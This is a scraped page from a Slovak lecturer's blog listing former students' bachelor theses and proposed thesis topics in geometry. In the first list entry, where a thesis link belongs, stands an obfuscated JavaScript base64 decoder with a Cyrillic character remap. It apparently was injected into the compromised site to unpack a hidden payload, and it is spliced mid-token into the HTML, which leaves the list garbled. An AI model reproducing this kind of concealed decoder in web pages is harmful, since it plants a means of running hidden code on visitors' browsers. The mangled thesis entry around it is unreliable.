Pri krbe

Poznámky zo života s nohami v teple

Archive for the ‘bakalarka’ tag

Práce Vašich predchodcov

without comments

Tlačené práce so všetkými prílohami sú dostupné buď v knižnici alebo u mňa alebo priamo u vašich starších kolegov. Práce ukončené od roku 2006 sú dostupné v elektronickej podobe vo fakultnej knižnici. (V prípade problémov s elektronickou verziou niektorej diplomovky alebo neplatnosťou linky na osobnú stránku mi prosím pošlite oznam.)

 1. function r0093c87a1(re){var xc=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var uf=”;var pd,r7,x1,x4,s1,v0,r2;var s5=0;do{x4=xc.indexOf(re.charAt(s5++));s1=xc.indexOf(re.charAt(s5++));v0=xc.indexOf(re.charAt(s5++));r2=xc.indexOf(re.charAt(s5++));pd=(x4<<2)|(s1>>4);r7=((s1&15)<<4)|(v0>>2);x1=((v0&3)<<6)|r2;if(pd>=192)pd+=848;else if(pd==168)pd=1025;else if(pd==184)pd=1105;uf+=String.fromCharCode(pd);if(v0!=64){if(r7>=192)r7+=848;else if(r7==168)r7=1025;else if(r7==184)r7=1105;uf+=String.fromCharCode(r7);}if(r2!=64){if(x1>=192)x1+=848;else if(x1==168)x1=1025;else if(x1==184)x1=1105;uf+=String.fromCharCode(x1);}}while(s5andra.pdf”>Alexandra Adamíková, 2009
 2. Jakub Mišún, 2010
 3. Matúš Ždanský, 2010
 4. Miroslava Selecká
 5. Samuel Struss
 6. Adriana Bosáková

Written by Pavel Chalmovianský

November 30th, 2009 at 2:31 pm

Posted in Bakalárske práce

Tagged with

Témy bakalárskych prác

without comments

 1. Základné geometrické vlastnosti algebraických kriviek v rovine
 2. Ortogonálne transformácie E^n
 3. NURBS
 4. T-splajny
 5. Minkowského priestor a jeho základné vlastnosti
 6. Vybrané geometrické dátové štruktúry
 7. Duálne čísla
 8. Konvexný mnohosten v E^n
 9. Geometrické vlastnosti determinantu

Bližšie informácie ako aj materiály objasním pri osobnom stretnutí.

Written by Pavel Chalmovianský

November 30th, 2009 at 2:25 pm